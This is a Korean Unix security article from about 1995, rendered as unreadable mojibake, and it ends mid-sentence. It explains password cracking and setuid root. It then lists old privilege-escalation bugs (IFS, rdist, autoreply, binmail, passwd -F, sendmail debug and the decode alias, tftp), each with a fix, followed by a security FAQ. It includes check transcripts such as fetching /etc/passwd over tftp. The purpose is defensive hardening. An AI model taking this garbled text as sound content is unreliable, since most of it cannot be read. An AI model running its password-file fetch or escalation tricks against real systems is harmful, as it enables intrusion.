¸¶ Áö¸·ÀÇ µÎ¹ø° ±ÛÀÚµéÀ» °¡Áö°í ÀÔ·ÂÇÑ Æнº¿öµå¸¦ ¾ÏÈ£ÈÇÏ°Ô
µÇ°í ÀÌ ¾ÏÈ£ÈÇÑ ÀڷḦ °¡Áö°í /etc/passwd¿Í ³»¿ëÀ» ºñ±³ÇÏ¿©
¿Ç´Ù¸é ·Î±×Àο¡ ¼º°øÇÏ°Ô µÇ´Â °ÍÀÌ´Ù.
º¸Åë Æнº¿öµå´Â 8ÀÚ¸¦ ±âÁØÀ¸·Î Çϱ⠶§¹®¿¡ Æнº¿öµå·Î
ÀÔ·ÂÇÑ ±ÛÀÚ¼ö¿Í ¸¶Áö¸· µÎ ±ÛÀÚ°¡ Áß¿äÇÑ Àǹ̸¦ °®°Ô µÈ´Ù. ¾Õ Àý¿¡ ¼µµ
¸»ÇßÁö¸¸ ÃæºÐÈ÷ ÃßÃøÇÒ ¼ö ÀÖ´Â Æнº¿öµå¸¦ »ç¿ëÇÏ¸é °ï¶õÇÏ´Ù.
¶Ç /etc/passwd ÆÄÀϷκÎÅÍ Æнº¿öµå¸¦ ÃßÃøÇØ ÁÖ´Â Åøµé(
Crack À̶óµçÁö Cops)À» »ç¿ëÇØ ¾Ë¾Æ³¾ ¼öµµ ÀÖ´Ù.
ÀÌ ÅøµéÀº ÀڽŵéÀÇ µ¶Æ¯ÇÑ ¾Ë°í¸®ÁòÀ» »ç¿ëÇϴµ¥, À̸¦
Å×¸é »çÀü¿¡ ³ª¿À´Â ´Ü¾îµéÀ̳ª, ID¸¦ µÚÁý¾î ´ëÀÔÇغ»´ÙµçÁö, Æнº¿ö µå ÆÄÀÏ¿¡¼
¾Ë¾Æ³½ ÀÚ·áµéÀ» ´ëÀÔÇغ»´ÙµçÁö ÇÏ´Â ¹æ¹ýÀÌ´Ù. ¹°·Ð ´ëÀÔÀ»
ÇÒ ¶§¿¡´Â crypt() ÇÔ¼ö¸¦ ÀÌ¿ëÇØ encrypt(¾ÏÈ£È)ÇÑ ´ÙÀ½ ÀÌ
°á°ú¸¦ /etc/passwd ÆÄÀÏ¿¡ ÀÖ´Â µÎ¹ø° fieldÀÎ º¯ÇüµÈ
ºÎºÐ°ú °è¼Óºñ±³ÇØ ¸Â´ÂÁö¸¦ È®ÀÎÇس»°Ô µÈ´Ù.
ÀÌ·± ÀÌÀ¯·Î ÀÎÇØ ÈçÈ÷ Àϻ󿡼 ¾²´Â ´Ü¾îµéÀº Àû¹ßµÉ
¿ì·Á°¡ ³ôÀºµ¥, ÁÁÁö ¾ÊÀº Æнº¿öµå·Î¼ ´ÙÀ½°ú °°Àº »ç·Ê¸¦ µé ¼ö ÀÖ´Ù .
ÁÁÁö¾ÊÀº Æнº¿öµåÀÇ ¿¹
ID¿Í °°Àº password
»ç¿ëÇÏ´Â ½Ã½ºÅÛÀÇ À̸§
ÄÄÇ»ÅÍ È£½ºÆ®ÀÇ À̸§
¿µ¾î»çÀü¿¡ ³ª¿À´Â ´Ü¾î (boss
, world .... )
ÀüȹøÈ£
»ýÀÏ
Å°º¸µåÀ§ÀÇ °°Àº ¼±»ó¿¡ ÀÖ´Â
±Û¼èµéÀÇ ¿¬¼Ó.(qwert,asdf .....)
µ¿ÀÏÇÑ ±ÛÀÚÀÇ ¿¬¼Ó (11111, eeeee
.... )
setuid¶õ ¹«¾ùÀΰ¡?
/etc/passwdÀÇ ¼ÒÀ¯ÁÖ´Â ºÐ¸íÈ÷ È£½ºÆ® °ü¸®ÀÚ(root)ÀÌ´Ù.
¶ÇÇÑ ¿ì¸®´Â Æнº¿öµå¸¦ ¹Ù²Û ´ÙÀ½ º¯°æµÈ ³»¿ëÀ»
/etc/passwd ÆÄÀÏ ¿¡ ÀúÀåÀ» ÇÏ°í ÀÖ´Ù. ÀÌ»óÇÏÁö ¾ÊÀº°¡?
º¸ÅëÀÇ ¿¹¶ó¸é permission denied ¶ó´Â ´«¿¡ ÀÍÀº
¸Þ½ÃÁö°¡ ¶°¾ß ÇÒ ÅÙµ¥ ¸»ÀÌ´Ù. ¿©±â ¿¡ ¾ÆÁÖ Áß¿äÇÑ ³»¿ëÀÌ
´ã°Ü ÀÖ´Ù. ¹Ù·Î setuid¶ó´Â °ÍÀÌ´Ù. ´ÙÀ½À» ¼öÇà½ÃÄÑ º¸ÀÚ.
% ls -al /bin/passwd
rwsr-xr-x 2 root 512 Jan 11
12:31 passwd
¾Õ¿¡¼ ¼³¸íÀÌ Àß µÆ°ÚÁö¸¸ setuid bit·Î¼ s°¡ Ç¥½ÃµÅ
ÀÖÀ½À» ¾Ë ¼ö ÀÖ´Ù. ÀÌ´Â ÀÌ ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇ´Â µ¿¾ÈÀº ·çÆ®ÀÇ ±ÇÇÑÀ»
°¡Áú ¼ö ÀÖ°Ô µÇ¸ç ÇÁ·Î±×·¥ÀÌ ³¡³²°ú µ¿½Ã¿¡ ÀÌ ±ÇÇÑÀº
»ç¶óÁö°Ô µÈ´Ù. ±×·± ÀÌÀ¯·Î Æнº¿öµå¸¦ ÀÌ¿ëÇØ /etc/p
asswd ÆÄÀÏÀ» ¿ì
¸®°¡ ¹Ù²Ü ¼ö ÀÖ´Â °ÍÀÌ´Ù.
¿ì¸®´Â ÀÌ·± setuid¸¦ ¸¹ÀÌ ÀÌ¿ëÇÏ°í ÀÖ´Ù. ·Î±×ÀÎ ÇÁ·ÒÇÁÆ®°¡
³ª¿ÔÀ» ¶§ ¿ì¸®´Â »ý°¢¾øÀÌ ·Î±×ÀÎÀ» ÇÏÁö¸¸ ³»ºÎ¿¡¼´Â »ó´çÈ÷ º¹ÀâÇÑ
±¸µ¿ÀÌ ÀÌ·ïÁö°í ÀÖ´Ù. ¿ì¼± login À̶ó´Â ¸Þ½ÃÁö ´ÙÀ½¿¡
µé¾î¿À´Â »ç¿ëÀÚÀÇ ID¸¦ ÀÐ¾î µéÀδÙ.
±×¸®°í Æнº¿öµå¸¦ ÀÐ¾î µéÀ̴µ¥ ÀоîµéÀÎ Æнº¿öµå¸¦
crypt() ÇÔ¼ö¸¦ ÀÌ¿ëÇØ ¾ÏȣȽÃŲ´Ù. ÀÌ ¾ÏÈ£ÈµÈ Æнº¿öµå¸¦ /etc/pas
sword(Shadowing passwd ÀÎ °æ¿ì´Â ´Ù¸¥ ÆÄÀÏ À̸¦Å׸é
passwd.adjunct °°Àº ´Ù¸¥ ÆÄÀÏÀ» ÂüÁ¶ÇÑ´Ù.)ÀÇ µÎ¹ø°
field¿Í ºñ±³ÇØ °°À¸¸é ¿Ã¹Ù¸¥ Æнº¿öµå¸¦ ÀÔ·ÂÇßÀ¸¹Ç·Î
loginÀ» Çã°¡ÇØÁØ´Ù. ´Ù½Ã ls /bin/loginÀ» Çغ¸¸é ¾Ë°ÚÁö¸¸ ÀÌ
loginµµ root ¼ÒÀ¯ÀÇ se tuid bit°¡ ºÙÀº ÆÄÀÏÀÌ´Ù.
¿©±â¼ ¾Ë¾ÆµÖ¾ß ÇÒ Á¡Àº Æнº¿öµå¸¦ È®ÀÎÇÒ ¶§ /etc/passwd
ÆÄÀÏÀÇ µÎ ¹ø° field¸¦ Ç®¾î¼ ÀÔ·ÂµÈ Æнº¿öµå¿Í ¸ÂÃç º¸´Â °Ô
¾Æ´Ï¶ó´Â Á¡ÀÌ´Ù. ÀÌ·± decrypt ÇÔ¼ö´Â ¾øÀ¸¸ç ¾Ë°í¸®Áòµµ
Á¸ÀçÄ¡ ¾Ê´Â´Ù. ÀÌ·Î ÀÎÇØ ºÒ¿ÏÀüÇÏÁö¸¸ À¯´Ð½ºÀÇ º¸¾ÈÀÌ ÀÌ·ïÁö°í ÀÖ ´Â
°ÍÀÌ´Ù.
¶ÇÇÑ ¾Õ¿¡¼ À̾߱âÇßÁö¸¸ ·çÆ® ¼ÒÀ¯ÀÌ°í setuid°¡ ½ÇÇàµÇ´Â
µ¿¾ÈÀº ½Ã½ºÅÛ°ü¸®ÀÚÀÇ ±ÇÇÑÀ» °®´Â´Ù°í Çß´Ù. ¿ì¸®´Â ÀÌ°ÍÀ» º¸°í
effective uid¶ó°í ÇÑ´Ù. ÇØÄ¿µéÀº ÀÌ·± ·çÆ® ¼ÒÀ¯ÀÇ setuid
bit ÆÄÀϵéÀ» ½ÇÇà½ÃÅ°´Â µ¿¾È ÀÎÅÍ·´Æ®¸¦ °É ¼ö
ÀÖ´Â ½©
½ºÅ©¸³ Æ®¶óµç°¡ ÅøÀ» ÀÌ¿ëÇØ ÀÌ ÆÄÀϵéÀÇ ½ÇÇàÀ» ÁßÁö½ÃŲ
»óÅ·ΠÀÖ°Ô ÇÑ´Ù. Áï rootÀÇ ±ÇÇÑÀ» °¡Áø ä·Î ÀÖµµ·Ï ÇÏ´Â °ÍÀÌ´Ù. ÀÌ·±
½ÄÀ¸·Î ÇØ rootÀÇ ±ÇÇÑÀ» ºÒ¹ýÀûÀ¸·Î ȹµæÇÏ´Â °ÍÀÌ ´ëºÎºÐÀÇ
ÇØÅ·¹æ¹ýÀÌ´Ù.
°ú°ÅÀÇ ÇØÅ· À¯Çüµé
¿¹Àü¿¡´Â ÁÖ·Î ³×Æ®¿öÅ©»óÀ̳ª ·ÎÄà ȣ½ºÆ®»ó¿¡¼ config
urationÀÌ À߸øµÈ °ÍÀ» ÀÌ¿ëÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ¾ò´Â Ãʺ¸ÀûÀÎ ÇØÅ·ÀÌ
¸¹¾Ò´Ù. Áï, OS¸¦ ÀνºÅçÇϸé ÇÁ·Î±×·¥µéÀÇ Æ۹̼ÇÀÌ ÀûÀý
È÷ Á¶Á¤ ¾ÈµÅÀÖ´Â °æ¿ì°¡ ¸¹Àºµ¥, À̸¦ ¾Ç¿ëÇØ È£½ºÆ® °ü¸®ÀÚ¸¸ÀÌ º¸°í ¾µ ¼ö
ÀÖ´Â ÆÄÀϵµ ¸¶À½´ë·Î Á¶ÀÛÇÏ´Â °æ¿ì°¡ ¿¹ÀüÀÇ ÇØ Å· À¯ÇüÀ̾ú´Ù.
¶ÇÇÑ ¿ôÁö ¸øÇÒ ¾ê±â·Î ÇØÅ·½Ãµµ¸¦ Çصµ °è¼Ó ½ÇÆÐÇÏ°Ô µÇÀÚ, ±â°è¸¦ µé°í
ÈÉÃÄ ´Þ¾Æ³ µµµÏÇØÄ¿(?) µµ ÀÖ´Ù.
±âÃÊ Áö½ÄÀ» ¾Ë¾Ò´Ù¸é ¿¹Àü¿¡ ÀÖ¾ú´ø ÇØÅ·À¯Çü°ú, ¿¹ÀüÀÇ
¹ö±×µéÀ» »ìÆ캸ÀÚ. ¹°·Ð ¾ð·Ð¸ÅüÀÇ ¼º°Ý»ó ÇöÀç °¡Àå ½É°¢ÇÑ È¦(º¸ ¾È±¸¸Û)µéÀº
½ÆÁö ¾Ê¾Ò´Ù. ¶ÇÇÑ ºÐ·®»ó ¼ö¸¹Àº ¹ö±×µéÁß ±ØÈ÷ ÀϺκи¸À»
´Ù·ç¾ú´Ù.
/usr/local/bin/sysinfo version 1.0.0 ÀÇ ¹ö±×
À¯´Ð½º ½Ã½ºÅÛ¿¡´Â IFS(Internal File Seperator)¶ó´Â ȯ°æ
º¯¼ö°¡ ÀÖ´Ù. ÀÌ°ÍÀÌ shell º¯¼ö·Î ¼±¾ðÇÒ ¶§ ¿©·¯
¹®Á¦¸¦ ÀÏÀ¸Å°´Â °æ¿ì°¡ ¸¹´Ù. IFS¶ó´Â ȯ°æº¯¼ö¸¦ ³»ºÎ
À¯ÀúµéÀÌ ¸¶À½´ë·Î Á¶ÀÛÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ¾ò¾î³¾ ¼ö Àִµ¥ ÀÌ·¯ÇÑ À¯ÇüÀÇ
ÇØÅ·À¸·Î ´Â loadmodule ÇØÅ·,
expreserve ÇØÅ·, rdist ÇØÅ· µîÀÌ ÀÖ´Ù. ÀÌ´Â ´Ü¼øÈ÷ ½© º¯¼öÁß IFS¸¦ /·Î
¼±¾ðÇÏ°í (½©¸¶´Ù ´Ù¸£°ÚÁö¸¸ ¿¹¸¦ µé¾î csh À̶ó¸é % setenv
IFS /) ¸î°¡Áö Æ®¸¯À» ÅëÇØ ÀϹÝÀ¯ÀúµéÀÌ ½±°Ô rootÀÇ ±ÇÇÑÀ»
°¡Áú ¼ö ÀÖ°Ô µÈ´Ù.
ÇØ°áÃ¥ : sysinfo ¹öÀü 2.0.6 À» ±¸Çؼ »õ·Î ÀνºÅç ÇÑ´Ù.
rdist ¹ö±×
SunOS 4.1.2¿Í ±× ÀÌÀüÀÇ OS, A/UX 2.0.1, SCO 3.2v4.2,
BSD NET/2 °è¿ Systems ¶Ç´Â BSD
rdist¸¦ Áö¿øÇÏ´Â ´ëºÎºÐÀÇ ½Ã½ºÅÛ¿¡ ¼ /usr/ucb/rdist³ª
/usr/bin/rdist´Â º¸¾È¿¡ ¹®Á¦°¡ µÇ´Â ¹ö±×¸¦ °¡Áö°í
ÀÖ´Ù.
rdist´Â popen(3) À̶ó´Â ³»ºÎ ½Ã½ºÅÛ ÇÔ¼ö(C function)À»
ÀÌ¿ëÇØ ÇØÅ·À» ÇÏ°Ô µÈ´Ù. À̶§ ÇØÅ·À» À§ÇØ ÀÌ¿ëÇÏ´Â
sendmail À̶õ ÇÁ·Î±×·¥Àº root ÀÇ ±ÇÇÑÀ» °®°í ½ÇÇàÀÌ
µÇ°Ô µÈ´Ù. ÀÌ ¿ª½Ã setuid ¶§¹®Àε¥ À̸¦ ¾Ç¿ëÇÏ¿© ¾î¶² À¯Àú¶óµµ
root °¡ µÉ ¼ö ÀÖ´Ù .
ÇØ°áÃ¥ : SunOsÀÇ Patch-ID# 100383-06 ÀÇ ÆÐÄ¡¸¦ °¡Á®¿Í¼
¼³Ä¡Çϸé ÇØ°áÀÌ µÈ´Ù. ¶Ç´Â rdistÀÇ ±â´ÉÀ» ¾ø¾Ö±â
À§ÇØ setuid bi t¸¦ Á¦°ÅÇϰųª Æ۹̼ÇÀ» 0À¸·Î Çعö¸°´Ù.
autoreply ¹ö±×
/usr/local/bin/autoreply´Â elm ÆÐÅ°ÁöÀÇ ¼³Ä¡¿¡¼ ºÎ¼öÀûÀ¸·Î
µû¶ó³ª¿À´Â ÇÁ·Î±×·¥ÀÌ´Ù. elmÀÇ ¹ö±×´Â ¸ðµç OS¿¡¼
°øÅëÀûÀ¸ ·Î ÁöÀûµÇ´Â ¹®Á¦Á¡ÀÌ´Ù. µû¶ó¼ ÀÌ ¹ö±×´Â ´ë´Ù¼öÀÇ
ÇØÄ¿µé¿¡°Ô ´ë´ÜÇÑ »ç¶û(?)À» ¹Þ¾Ò´ø ¹ö±×ÀÌ´Ù. ÀÌ ¹ö±×´Â ¶ÇÇÑ OS¿¡ °ü°è
¾øÀÌ Elm Mail SystemÀ» ¾²±â¸¸ ÇÏ¸é º¸¾ÈÀÇ ÇêÁ¡À» °¡Áö°Ô
µÈ´Ù´Â µ¥¿¡¼ ÁÖ¸ñÇÒ ¸¸ÇÏ´Ù. ¿ª½Ã setuidÀÇ ¼öÇàÁß ÀÎÅÍ·´Æ®¸¦
°É ¾î rootÀÇ ±ÇÇÑÀ¸·Î ÇÁ·Î±×·¥ÀÌ ÀÛµ¿ÇÏ´Â »óÅ¿¡¼ ÀÚ½ÅÀÌ
¿øÇÏ´Â ÀÛ¾÷À» ¼öÇàÇϵµ·Ï Á¶ÀÛÇÑ´Ù. À̸¦ ÀÌ¿ëÇØ ¿øÇÏ´Â °÷¿¡ ÀÓÀÇÀÇ ÆÄÀÏÀ»
±â·ÏÇÒ ¼ö ÀÖ´Ù. À̸¦ ÀÌ¿ëÇØ root µð·ºÅ丮¿¡ .rhosts¿¡
Á¶ÀÛÀ» ÇÏ´Â °æ¿ì°¡ ´ëºÎºÐÀÌ´Ù.
ÇØ°áÃ¥ : ÇöÀç·Î¼ÀÇ °¡Àå ÁÁÀº ÇØ°áÃ¥Àº ¾Æ¿¹ autoreplyÀÇ
Æ۹̼ÇÀ» 0À¸·Î ÁÖ¾î »ç¿ëÀ» ¸øÇÏ°Ô Çعö¸®´Â °ÍÀÌ´Ù. ÇÏÁö¸¸ ÆÛ¹Ì ¼ÇÀ»
666À¸·Î µÎ´Â °Íµµ ¾ÈÀüÇÏ´Ù.
binmail(/usr/bin/mail)ÀÇ ¹ö±×
ÀÌ´Â ½ã OS 4.1.xÀÇ ¹öÀü¿¡¼ Àû¿ëµÇ´Â ¹ö±×ÀÌ´Ù. ÀÌ´Â
ÆÄÀÏ ½Ã½ºÅÛÀÇ ¾î´À °÷¿¡¶óµµ ÀÓÀÇÀÇ ÆÄÀÏÀ» »ý¼º½Ãų ¼ö ÀÖ¾î¼ ÀÏ¹Ý À¯ÀúµéÀÌ
root°¡ µÉ ¼ö ÀÖ´Ù. ÀÌ ¹ö±×´Â /var/spool/mailÀÇ µð·ºÅ丮
Æ۹̼ÇÀÌ rwxrwxrwt(ȤÀº rwxrwxr-x)·Î ¸ðµç
À¯Àú¿¡°Ô ¾²±â ±ÇÇÑÀÌ Çã°¡µÅÀֱ⠶§¹®¿¡ ¾ß±âµÆ´ø ¹ö±×ÀÌ´Ù.
ÇØ°áÃ¥ : 1. vendor µé¿¡°Ô¼
patch ¸¦ ±¸ÇÑ´Ù.
2. °¡Àå ÀÌ»óÀûÀ¸·Î ÇØ°áÀ» ÇÏ´Â °ÍÀº mail spool µð·ºÅ丮ÀÇ
¾²±â ±ÇÇÑÀ» ¾Æ¿¹ ¾ø¾Ö¹ö¸®´Â °ÍÀ̳ª, ÀÌ ¾²±â ±ÇÇÑÀÌ ¾ø´Ù¸é
elmÀ̳ª /bin/mail, /usr/ucb/Mail À» »ç¿ëÇÒ ¼ö ¾ø°Ô µÈ´Ù.
passwd(/usr/bin/passwd)ÀÇ ¹ö±×
/bin/passwd -FÀÇ ¹ö±×¶ó°íµµ ÇÏ´Â ÀÌ°ÍÀº SunOS 4.1.xÀÇ
±âÁ¾¿¡¼ ÇØ´çµÇ´Â ¹ö±×ÀÌ´Ù. ¾î¶°ÇÑ ÀÏ¹Ý À¯Àú¶óµµ À§ÀÇ ¹ö±×¸¦
ÀÌ ¿ëÇØ, ÀÓÀÇÀÇ ÆÄÀÏ(¹°·Ð °ø°ÝÀ» ¸ñÀûÀ¸·Î ÇϹǷΠ/ µð·ºÅ丮ÀÇ
.rhosts¸¦ »ý¼º½ÃÅ°´Â °ÍÀÌ´Ù.)À» »ý¼ºÇØ ÀÌ´Â ÆÄÀÏÀÌ »ý¼ºµÇ±â¸¦
¿øÇÏ´Â µð·ºÅ丮¿¡ symbolic link¸¦ °É¾î³õ°í ÀÚ½ÅÀÌ ¸¸µé°í
½ÍÀº ÆÄÀÏÀ» ÀÌ °÷À¸·Î ¸µÅ©½ÃÄѹö¸®´Â ¹æ¹ýÀ» ÀÌ¿ëÇÏ´Â °ÍÀÌ´Ù.
ÇØ°áÃ¥: 1. º¥´õµé¿¡°Ô¼ ÆÐÄ¡(¹ö±× ¼öÁ¤ ÇÁ·Î±×·¥)¸¦ ±¸Çϵµ·Ï
ÇÑ´Ù.
2. passwdÀÇ ½ÇÇàÆÄÀÏ¿¡¼ -F ¿É¼ÇÀ» »èÁ¦ÇØ °£´ÜÈ÷ ÆÐÄ¡ÇÒ
¼ö ÀÖ´Ù.
SunOS 4.X.X /usr/lib/sendmailÀÇ ¹ö±×
ÈçÈ÷ SMTP(Simple Mail Transfer Protocol)ÀÇ ¹ö±×¶ó°í
ºÒ¸®±âµµ ÇÏ´Â °ÍÀÌ´Ù.ÀüÀÚ¿ìÆí ½Ã½ºÅÛÀº ¿ÜºÎ¸Á°úÀÇ ¿¬°á¿¡
ÇʼöÀûÀÎ À¯Æ¿¸®Æ¼·Î¼ BSD À¯´Ð½º¿¡´Â ¿ìÆíÀÇ ¹è´Þ°ú ¼ö½ÅÀ»
´ã´çÇÏ´Â sendmail ÇÁ·Î±×·¥ÀÌ Àִµ¥ ÀÌ ÇÁ·Î±×·¥ÀÇ ±¸ ¹öÀü¿¡´Âº¸¾È»óÀÇ
¹®Á¦¸¦ °¡Áö°í ÀÖ´Ù. ÀÌ°ÍÀº
ÀÚ½ÅÀÇ È£½ºÆ®ÀÇ 25¹ø Æ÷Æ®¸¦ ¿¾î º¸¾Æ ¹ö±×°¡ ÀÖ´ÂÁö È®ÀÎÀ» ÇØ º¸¾Æ¾ß ÇÑ´Ù. ÇöÀç
BSD 8.6.4 ¹ö
ÀüÀº ÀÌ ¹®Á¦Á¡ÀÌ ÀÖ´Â °ÍÀ¸·Î µå·¯³µ´Ù. ÀÌ¹Ì Worm ¿¡¼
½É°¢ÇÑ º¸¾È¹®Á¦¸¦ ÀÏÀ¸Å² ¹Ù ÀÖÀ¸¹Ç·Î ÃÖ½ÅÀÇ ¹öÀüÀ¸·Î ¹Ù²Ù¾î Áֱ⠹ٶõ´Ù.
ÇØ°áÃ¥ : sendmail ÇÑ±Û ¹öÀüÀ» ÀνºÅçÇÏ¸é µÈ´Ù. sendmail
ÇÑ±Û ¹öÀüÀº
ftp://cair-archive.kaist.ac.kr/pub/hangul/mail ¿¡¼
±¸ÇÒ ¼ö ÀÖ´Ù.
1) telnet <È£½ºÆ® À̸§> 25¸¦ Çؼ ÀÚ½ÅÀÇ È£½ºÆ®¿¡
¼³Ä¡µÈ sendmail ÀÇ ¹öÀü
À» È®ÀÎÇÑ´Ù.
2) /etc/aliases³ª /usr/ucb/aliases¿¡¼ 'decode'¸¦ Á¦°ÅÇÑ´Ù.
% cat /etc/aliases
decode: "|/usr/bin/uudecode"
À§¿Í °°ÀÌ µÇ¾î ÀÖÀ» ¶§´Â À§ ¹®ÀåÀ» ÁÖ¼® ó¸®ÇØÁØ´Ù.
¿Ã¹Ù¸¥ ¿¹
# cat /etc/aliases
...
#decode: "|/usr/bin/uudecode"
3) ÇÁ·Î±×·¥¿¡ ¸Þ½ÃÁö¸¦ º¸³»´Â °æ¿ì ½© ¸í·ÉÀ» º¸³»´Â
¹æ¹ýÀ» »ç¿ëÇÏÁö
¾Êµµ·Ï
ÇÑ´Ù.
4) sendmail.cf ¿¡¼ 'wizard' Æнº¿öµå¸¦ »ç¿ëÇÏÁö ¾Ê´Â´Ù.
5) sendmail ¿¡¼ 'debug' ¸í·ÉÀ» ÀÌ¿ëÇÏÁö ¾Ê´Â´Ù,
´ÙÀ½À» ÂüÁ¶Çϵµ·Ï ÇÑ´Ù.
baikdu % telnet localhost 25
Connected to localhost.
Escape character is '^]'.
220-baikdu.kaist.ac.kr Sendmail
8.6.9H1/Baikdu_KAIST_CSH ready at Thu,
16 Mar 1995
00:58:23 +0900
220 ESMTP spoken here
debug
500 Command unrecognized
wiz
500 Command unrecognized
kill
500 Command unrecognized
quit
221 baikdu.kaist.ac.kr closing
connection
Connection closed by foreign
host.
¸¸ÀÏ 'debug'¿¡ '200 Debug set'À¸·Î ÀÀ´äÇÑ´Ù¸é »õ ¹öÀüÀ¸·Î
±³Ã¼Çϱ⠹ٶõ´Ù.
tftp ¹ö±×
tftp(Trivial ftp)´Â µð½ºÅ© ¾ø´Â ¿öÅ©½ºÅ×À̼ǵéÀÇ ³×Æ®¿öÅ©
ºÎÆ®±â´ÉÀ¸·Î À¯Àúµ¥ÀÌÅͱ׷¥ ¹æ½ÄÀÇ Á¢¼Ó¾ø´Â ÇÁ·ÎÅäÄÝÀ» ÀÌ¿ëÇÑ ´Ù.
ÀÌ´Â ´Ü¼øÇÑ ÇÁ·ÎÅäÄÝÀ̹ǷΠº¸¾È»óÀÇ ÇêÁ¡À» °¡Áö°í ÀÖ´Ù.
tftp ¼³Ä¡¸¦ À߸øÇسõ¾ÒÀ» °æ¿ì ¿ÜºÎÀÇ ÇØÄ¿°¡ tftp¸¦ ÀÌ¿ëÇØ /e
tc/passwd ÆÄÀÏÀ» °¡Á®°¥ ¼ö°¡ ÀÖ´Ù. ÀÚ½ÅÀÇ È£½ºÆ®¿¡ ¼³Ä¡µÈ
tftp°¡ ¾ÈÀüÇÑÁö¸¦ get /etc/passwd¸¦ ÀÌ¿ëÇØ È®ÀÎÇغ¸±â
¹Ù¶õ´Ù.
[baram-sakai 193 ] tftp baram.kaist.ac.kr
tftp> status
Connected to baram.kaist.ac.kr.
Mode: netascii Verbose: off
Tracing: off
Rexmt-interval: 5 seconds, Max-timeout:
25 seconds
tftp> get /etc/passwd
Error code 1: File not found
tftp>
À§¿Í °°ÀÌ ¿¡·¯¸Þ½ÃÁö°¡ ¶ßÁö ¾Ê´Â´Ù¸é ¼³Ä¡°¡ À߸øµÈ °ÍÀÌ´Ï
¼öÁ¤Çϱ⠹ٶõ´Ù
. ¸¸ÀÏ ¾²Áö ¾Ê´Â´Ù¸é ¾Æ¿¹ Æ۹̼ÇÀ» 0À¸·Î µÎ¾î ÀÛµ¿À»
¸øÇÏ°Ô
Çϵ簡 /etc/inetd.conf ¸¦ ´ÙÀ½°ú °°ÀÌ µÐ´Ù.
tftp dgram udp wait nobody /usr/etc/in.tftpd
in.tftpd -s /tftpboot
TCP_WRAPPER¸¦ »ç¿ëÇÏ´Â °Íµµ ¸¹Àº µµ¿òÀÌ µÈ´Ù.
º¸¾È°ü·Ã FAQ
ÇØÄ¿°¡ ħÀÔÇϱ⠰¡Àå ÁÁÀº ½Ã±â¿Í ȯ°æÀº?
Àü»ê¸ÁÀ» ±¸¼ºÇÏ´Â ³×Æ®¿öÅ©ÀÇ ³¡¿¡´Â ³×Æ®¿öÅ©¸¦ ±¸¼ºÇϱâ
À§ÇÑ ÄÄÇ»Å͵é(È£½ºÆ®)µéÀÌ ºÙ¾î ÀÖ¾î¾ß ÇÏ°í ÀÌ È£½ºÆ®µéÀº ¿î¿µÃ¼ Á¦¸¦ µ¹¸®°Ô
¸¶·ÃÀÌ´Ù. ÇÏÁö¸¸ OS ´Â Àΰ£ÀÌ Â§ ÇÁ·Î±×·¥ÀÎ ÀÌ»ó ¹ö±×°¡
ÀÖ°Ô ¸¶·ÃÀÌ°í ÀÌ ¹ö±×·Î ¸»¹Ì¾Ï¾Æ º¸¾È»óÀÇ ¹®Á¦°¡ À¯ ¹ßµÇ´Â °ÍÀÌ´Ù. À¯´Ð½º
½Ã½ºÅÛ°ú °°ÀÌ ¸ÖƼÀ¯ÀúµéÀÌ »ç¿ëÇÏ´Â ½Ã½ºÅÛÀº º¸¾È»ó
¿Ïº®ÇØÁú ¼ö ¾ø´Ù´Â °ÍÀÌ ¼öÇÐÀûÀ¸·Î Áõ¸íÀÌ µÆ´Ù .
´õ±º´Ù³ª ÀÌ È£½ºÆ®¸¦ ³×Æ®¿öÅ©»ó¿¡ ¿¬°áÇسõ°Ô µÇ¸é ´õ
¹®Á¦°¡ ÀϾ°Ô µÇ´Âµ¥,È£½ºÆ® ³»ºÎÀÇ ¹ö±×¸¦ ÆÐÄ¡ÇÏÁö ¾ÊÀºÃ¤ ³×Æ®¿ö Å©»ó¿¡ ¿Ã·Á
³õ°Ô µÇ¸é '¹äÀ» Â÷·Á ³õ¾ÒÀ¸´Ï ¹äÀ» ¸Ôµµ·Ï ÇϽÿÀ'¶ó°í
ÇØÄ¿µé¿¡°Ô ³»ÁÖ´Â ¼ÀÀÌ µÈ´Ù. ±×·¡¼ °¡Àå ¿Ïº®ÇÏ°Ô º¸¾È À» À¯ÁöÇÏ°í ½ÍÀ¸¸é
³×Æ®¿öÅ©¿¡ ¿Ã·Á³õ±â Àü¿¡ ³»ºÎ Ȧ(hole)À» ¿ÏÀüÈ÷ ÆÐÄ¡¸¦
ÇÏ°í, ±× ´ÙÀ½¿¡ ³×Æ®¿öÅ©¿¡ ¿¬°áÇسõ´Â °ÍÀÌ ÁÁ ´Ù.
OS¸¦ °« ÀνºÅçÇÏ°í³ Á÷ÈÄ¿¡´Â OSÀÇ ¹ö±×µéÀÌ ¾ÆÁ÷ ³²¾Æ
ÀÖ´Â »óÅ¿©¼ ÀÌ ¶§ ÇØÄ¿µé¿¡°Ô ħÀÔÀ» ¹Þ°Ô µÇ¸é
¼Ó¼ö¹«Ã¥ÀÌ µÈ´Ù. ¶ÇÇÑ
ºÒÇÊ¿äÇÑ ¼ºñ½º¸¦ ¸¹ÀÌ ÇÏ´Â °æ¿ì ÇØÄ¿µéÀÌ Ä§ÀÔÀ» Çϱâ
´õ ÁÁ¾ÆÁö°Ô µÇ¹Ç·Î, °¡±ÞÀûÀÌ¸é ºÒÇÊ¿äÇÑ ¼ºñ½º´Â ÇÏÁö ¾Ê´Â °Í ÀÌ
ÁÁ´Ù.(guest ¾ÆÀ̵ð Á¦°øÀ̳ª sonnim ¾ÆÀ̵ð Á¦°ø °°Àº
°æ¿ì)
º¸¾ÈÀ» °ÈÇØÁÖ´Â µµ±¸¿¡´Â ¾î¶² °ÍÀÌ ÀÖ³ª (ȤÀº º¸¾ÈÀ»
ÀÚµ¿ÈÇØÁÖ´Â ÇÁ·Î±×·¥Àº?)
¿ì¼± º¸¾ÈÀ» ÀÚµ¿ÈÇØÁÖ´Â ÅøÀº ÀÖÀ» ¼öµµ ¾ø°í, À־µ
¾ÈµÇ°í, ÀÖÁöµµ ¾Ê´Ù. Àü¼¼°èÀûÀ¸·Î ÄÄÇ»ÅÍ º¸¾ÈÀº È°¹ßÇÑ ¿¬±¸ÀÇ ´ë»óÀÌ µÇ°í
ÀÖ´Ù. ftp://cert.orgÀ̳ª, ftp://coast.cs.purdue.edu
µî¿¡¼ ÁÁÀº ÅøÀ» ¾òÀ» ¼ö ÀÖ°í ¶Ç KUS ÆÀ µµ
